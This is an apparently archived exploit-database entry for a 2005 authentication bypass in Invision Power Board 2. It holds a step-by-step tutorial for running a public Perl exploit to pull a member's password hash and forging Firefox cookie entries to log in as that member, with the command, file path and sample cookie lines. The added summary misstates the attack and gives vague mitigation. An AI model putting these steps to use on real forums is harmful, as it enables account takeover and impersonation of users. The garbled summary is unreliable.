Tutorial for the recent exploit released by Petey Beege

vendor:

Invision Power Board

by:

danica jones

7.5

CVSS

HIGH

IPB Authentication Bypass

287

CWE

Product Name: Invision Power Board

Affected Version From: 2

Affected Version To: 2

Patch Exists: YES

Related CWE: N/A

CPE: a:invision_power_services:invision_power_board

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2005

Tutorial for the recent exploit released by Petey Beege

This tutorial explains how to bypass authentication in Invision Power Board (IPB) version 2. It involves exploiting a vulnerability in the IPB authentication system which allows an attacker to bypass authentication and gain access to the application. The exploit requires the attacker to have access to the Mozilla Firefox cookie file, which can be found in the user's profile directory. The attacker then adds two entries to the cookie file, one for the member_id and one for the pass_hash. The values for these entries are taken from the output of the exploit. Once the entries are added, the attacker can then login to the application using the modified cookie file.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the authentication system is secure and that the cookie file is not accessible to unauthorized users.

Source

Exploit-DB raw data:

# danica jones <danica6699@gmail.com>

Tutorial for the recent exploit released by Petey Beege.

1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/)
2. Make sure you have LWP::UserAgent perl module if not do this:
     a. perl -MCPAN -e 'shell'
     b. inside the perl shell, do this 'install LWP::UserAgent'
3. Run the exploit. Get the password hash for the desired login id

ex. inv.pl http://forums.example.com 2 2

Where 2 is the login id and 2 for version 2 of IPB.

4. Open wordpad. Edit Mozilla Firefox's cookie file. Mine is located at

C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb9.default\cookies.txt"

Add the following entries:

forums.example.com        FALSE        /        FALSE		1148708747	  member_id        1
forums.example.com        FALSE        /        FALSE		1148708747        pass_hash        ecb735f70028a9cdb819828f4aced78c

Notice the value of member_id and pass_hash taken from the values
generated by the exploit.

5. Fire up Mozilla Firefox and login to http://forums.example.com

Enjoy!


# milw0rm.com [2005-05-27]